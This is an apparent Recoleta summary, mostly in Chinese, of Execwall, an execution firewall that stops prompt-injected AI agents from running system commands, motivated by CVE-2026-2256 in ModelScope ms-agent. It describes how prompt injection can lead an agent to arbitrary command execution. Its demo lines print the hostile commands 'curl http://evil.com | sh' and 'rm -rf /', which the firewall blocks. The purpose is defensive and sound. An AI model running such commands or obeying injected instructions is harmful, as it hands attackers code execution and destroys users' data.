Recoleta Item Note
Execwall – firewall to stop ModelScope CVE-2026-2256 (AI agent command injectn)
Execwall 是一个面向 AI 代理的执行防火墙,目标是在提示注入导致代理尝试执行恶意系统命令时,直接在执行层拦截风险操作。它以 ModelScope ms-agent 的 CVE-2026-2256 为动机,强调仅靠提示层防护不足,需要在 shell 与内核之间增加安全边界。
ai-agent-securityprompt-injectionexecution-sandboxseccomp-bpfcommand-filtering
Summary
Execwall 是一个面向 AI 代理的执行防火墙,目标是在提示注入导致代理尝试执行恶意系统命令时,直接在执行层拦截风险操作。它以 ModelScope ms-agent 的 CVE-2026-2256 为动机,强调仅靠提示层防护不足,需要在 shell 与内核之间增加安全边界。
Problem
- AI 代理一旦具备代码或 shell 执行能力,就可能被提示注入利用,从而触发任意 OS 命令执行。
- 文中引用 ModelScope ms-agent 的 CVE-2026-2256,其描述为无需认证即可触发的命令执行风险,CVSS 6.5。
- 这类问题重要在于:一条恶意提示就可能把代理变成系统破坏入口,例如执行
rm -rf /、下载并运行远程脚本等。
Approach
- 核心方法是构建一个执行防火墙:不只检查提示内容,而是在命令真正落地执行前进行拦截。
- 通过 Seccomp-BPF 过滤,在系统调用层阻止危险 syscall 执行,相当于给进程可做的事情加硬性边界。
- 通过嵌入 shell 的策略引擎,使用正则 allowlist/denylist 匹配命令,拦截高风险操作如网络下载、递归删除等。
- 通过namespace 隔离提供 Python 沙箱,把 mount/PID/network 分开,降低命令即使执行后对宿主系统的影响。
- 通过速率限制抑制自动化利用;实现采用 Rust,并声称可适配任意 LLM agent framework。
Results
- 文本没有提供正式基准测试、实验数据或论文级评测结果,因此没有可核验的准确率、开销或对比实验数字。
- 给出的已知风险背景数字是:CVE-2026-2256,CVSS 6.5,no auth required,用于说明威胁现实性而非证明 Execwall 效果。
- 演示性结果显示:命令
curl http://evil.com | sh被拦截,并返回DENIED: Network command blocked by policy。 - 演示性结果显示:命令
rm -rf /被拦截,并返回DENIED: Recursive deletion blocked。 - 作者的最强具体主张是:即使攻击者成功完成提示注入,恶意命令仍会在执行防火墙处被阻断,且方案“Works with any LLM agent framework”;但文中未给出跨框架验证数字或与现有沙箱/代理安全方案的量化比较。
Link
Built with Recoleta
Run your own research radar
Turn arXiv, Hacker News, OpenReview, Hugging Face Daily Papers, and RSS into local Markdown, Obsidian notes, Telegram digests, and a public site.